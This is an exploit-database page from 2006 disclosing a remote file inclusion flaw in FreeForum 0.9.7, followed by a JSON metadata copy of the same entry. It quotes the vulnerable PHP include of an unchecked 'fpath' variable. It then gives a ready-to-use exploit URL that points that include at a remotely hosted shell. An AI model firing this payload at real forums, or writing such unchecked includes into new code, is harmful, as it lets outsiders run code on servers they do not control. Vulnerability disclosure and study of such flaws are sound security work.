Search...

FreeForum 0.9.7 - forum.php Remote File Inclusion

2006-10-07T00:00:00

ID EXPLOITPACK:06C72F523F25F923E634FC847D550C1A
Type exploitpack
Reporter Mehmet Ince
Modified 2006-10-07T00:00:00

Description

FreeForum 0.9.7 - forum.php Remote File Inclusion

                                        
                                            -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

FreeForum 0.9.7 (fpath) Remote File Include Vulnerability

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Discovered by XORON(turkish hacker)

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

URL: http://www.ezforum.de/downloads/Forum.zip (229kb)

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Vuln. Code: in forum.php.

if(!isset($cfg_file))$cfg_file="config/config.inc.php";
if(!isset($fpath))$fpath=".";
if(!isset($getvar))$getvar='';
include("$fpath/lib/php/classes.php");

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Exploit: /forum.php?cfg_file=1&fpath=http://sh3LL?

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Thanx: str0ke, Preddy, Ironfist, Stansar, SHiKaA, O.G,

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

# milw0rm.com [2006-10-07]

JSON Vulners Source

Initial Source

{"lastseen": "2020-04-01T19:04:16", "references": [], "description": "\nFreeForum 0.9.7 - forum.php Remote File Inclusion", "edition": 1, "reporter": "Mehmet Ince", "exploitpack": {"type": "webapps", "platform": "php"}, "published": "2006-10-07T00:00:00", "title": "FreeForum 0.9.7 - forum.php Remote File Inclusion", "type": "exploitpack", "enchantments": {"dependencies": {"references": [], "modified": "2020-04-01T19:04:16", "rev": 2}, "score": {"value": 0.7, "vector": "NONE", "modified": "2020-04-01T19:04:16", "rev": 2}, "vulnersScore": 0.7}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2006-10-07T00:00:00", "id": "EXPLOITPACK:06C72F523F25F923E634FC847D550C1A", "href": "", "viewCount": 3, "sourceData": "-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n\nFreeForum 0.9.7 (fpath) Remote File Include Vulnerability\n\n-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n\nDiscovered by XORON(turkish hacker)\n\n-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n\nURL: http://www.ezforum.de/downloads/Forum.zip (229kb)\n\n-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n\nVuln. Code: in forum.php.\n\nif(!isset($cfg_file))$cfg_file=\"config/config.inc.php\";\nif(!isset($fpath))$fpath=\".\";\nif(!isset($getvar))$getvar='';\ninclude(\"$fpath/lib/php/classes.php\");\n\n-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n\nExploit: /forum.php?cfg_file=1&fpath=http://sh3LL?\n\n-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n\nThanx: str0ke, Preddy, Ironfist, Stansar, SHiKaA, O.G,\n\n-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n\n# milw0rm.com [2006-10-07]", "cvss": {"score": 0.0, "vector": "NONE"}}